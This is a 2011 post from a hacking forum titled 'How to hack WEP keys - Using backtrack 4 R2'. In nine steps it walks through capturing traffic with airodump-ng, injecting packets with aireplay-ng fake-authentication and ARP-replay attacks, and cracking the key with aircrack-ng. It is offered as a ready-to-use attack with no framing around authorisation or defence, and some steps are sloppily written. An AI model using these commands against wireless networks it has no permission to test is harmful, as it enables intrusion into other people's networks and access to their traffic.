Hacking to the Next LEVEL
Please Register Here to Get Full Access

Rameez Ajmeri

Join the forum, it's quick and easy

Hacking to the Next LEVEL
Please Register Here to Get Full Access

Rameez Ajmeri
Hacking to the Next LEVEL
Would you like to react to this message? Create an account in a few clicks or log in to continue.

How to hack WEP keys - Using backtrack 4 R2

Go down

How to hack WEP keys - Using backtrack 4 R2 Empty How to hack WEP keys - Using backtrack 4 R2

Post by LiF3 H4CK3R Tue Mar 08, 2011 11:24 am

Step 1: Open console and type in "airodump-ng wlan0"

Step 2: Now open up a new console window, but don't close out of the current window.

Step 3: Type in "airodump-ng -w wep -c (Channel) --bssid (BSSID) wlan0

Step 4: Open up a new console Window, and close out of the first window.

Step 5: Type in "aireplay-ng -1 0 -a (BSSID) wlan0

Step 6: Open up another console windows, but don't close out of any.

Step 7: Type in "aireplay-ng -3 -b (BSSID) wlan0

Step 8: Wait for #data in the first console window to reach at least 30,000. It is ok for it to go higher, but isn't required.

Step 9: After that, press Control + C, and the type in
"dir" then "aircrack-ng wep-01.cap"
LiF3 H4CK3R
LiF3 H4CK3R
Rameez (ADMIN)
Rameez (ADMIN)

Posts : 36
Points : 103
Join date : 2011-01-22
Age : 35
Location : H3LL

https://alternate-reality.4umer.com

Back to top Go down

Back to top


 
Permissions in this forum:
You cannot reply to topics in this forum